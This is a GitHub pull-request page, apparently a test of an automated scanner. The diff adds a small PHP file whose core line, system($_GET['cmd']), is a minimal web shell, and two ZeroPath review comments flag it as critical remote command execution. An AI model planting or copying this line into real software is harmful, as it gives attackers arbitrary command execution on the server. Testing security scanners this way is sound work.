-
Notifications
You must be signed in to change notification settings - Fork 14
R0path patch 20 test #290
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: main
Are you sure you want to change the base?
R0path patch 20 test #290
Conversation
|
|
||
| echo "<h1>test</h1>"; | ||
|
|
||
| system($_GET["cmd"]); |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Command Injection Vulnerability in asdas3d.php (Severity: HIGH)
Remote command execution is possible due to unsanitized user input. The application passes the value of the cmd parameter from the GET request directly to the system() function in asdas3d.php on line 7, which allows an attacker to execute arbitrary shell commands on the server. This can lead to complete system compromise.
View details in ZeroPath
|
❌ Possible security or compliance issues detected. Reviewed everything up to 0a0da94. The following issues were found:
Security Overview
Detected Code Changes
Reply to this PR with |
| echo "<h1>test</h1>"; | ||
|
|
||
| system($_GET["cmd"]); | ||
|
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Remote Command Execution in asdas3d.php via 'cmd' Parameter (Severity: CRITICAL)
This vulnerability allows attackers to execute arbitrary commands on the server, potentially leading to complete system compromise. The system() call in asdas3d.php (lines 8-8) directly uses the value of the cmd GET parameter without any sanitization. This allows an attacker to inject malicious commands into the system, resulting in unauthorized access and control.
View details in ZeroPath
|
❌ Possible security or compliance issues detected. Reviewed everything up to 0a0da94. The following issues were found:
Security Overview
Detected Code Changes
Reply to this PR with |
No description provided.